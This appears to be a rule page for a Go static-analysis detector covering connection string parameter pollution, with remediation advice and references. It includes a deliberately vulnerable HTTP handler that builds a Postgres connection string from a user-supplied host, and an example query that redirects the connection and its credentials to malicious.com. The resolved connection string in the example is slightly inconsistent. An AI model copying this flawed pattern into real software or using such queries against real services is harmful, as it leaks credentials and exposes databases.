Connection String Parameter Pollution

go.connection_string_parameter_pollution

Severity

critical

Resource

Resource Management

Language

Description

External control of connection string.

Rationale

Database connectivity typically involves constructing a connection string – a snippet of text encoding the details of the connection to the database, such as hostname, database name, and credentials.

When user input is improperly included in a connection string, it can lead to parameter pollution. This means that the attacker can inject additional parameters or override existing ones, potentially accessing databases they shouldn’t or altering their privileges.

Below is a vulnerable Golang code snippet demonstrating this issue:

package connection_string_parameter_pollution

import (
	"database/sql"
	"fmt"
	"log"
	"net/http"

	_ "github.com/lib/pq"
)

func connectToDatabase(userHost string) (*sql.DB, error) {
	if userHost == "" {
		return nil, fmt.Errorf("Host parameter is empty")
	}

	connStr := fmt.Sprintf("postgres://user:password@%s/mydb?sslmode=disable", userHost)
	db, err := sql.Open("postgres", connStr) // FLAW
	if err != nil {
		return nil, err
	}

	return db, nil
}

func handler(w http.ResponseWriter, r *http.Request) {
	userHost := r.URL.Query().Get("host")
	db, err := connectToDatabase(userHost)
	if err != nil {
		http.Error(w, "Database connection error", http.StatusInternalServerError)
		log.Print("Connection error: ", err)
		return
	}
	defer db.Close()

	fmt.Fprintf(w, "Connected to database at %s", userHost)
}

func main() {
	http.HandleFunc("/", handler)
	log.Fatal(http.ListenAndServe(":8080", nil))
}

If an attacker submits the following query:

/?host=localhost:5432@malicious.com/mydb?sslmode=disable

The resulting connection string becomes:

postgresql://user:password@localhost:5432@malicious.com/mydb?sslmode=disable

This could:

Redirect the connection to an attacker-controlled host.
Disable SSL/TLS encryption.
Leak credentials.

Remediation

Mitigating connection string parameter pollution involves several key practices:

Use Parameter Objects: Avoid concatenating user input into connection strings. Instead, use APIs or configurations that separate parameters from the connection logic.
Validate and Sanitize User Input: If user input must be incorporated into the connection process, ensure it is strictly validated and sanitized according to expected patterns.
Environment Configuration: Use environment variables or configuration files to manage sensitive credential information away from user modification capabilities.

Configuration

The detector has the following configurable parameters:

sources, that indicates the source kinds to check.
neutralizations, that indicates the neutralization kinds to check.

Unless you need to change the default behavior, you typically do not need to configure this detector.

References

CWE-15 : External Control of System or Configuration Setting.
Connection String Parameter Pollution Attacks, by C. Alonso, Blackhat DC 2010.
OWASP Top 10 2021 - A03 : Injection.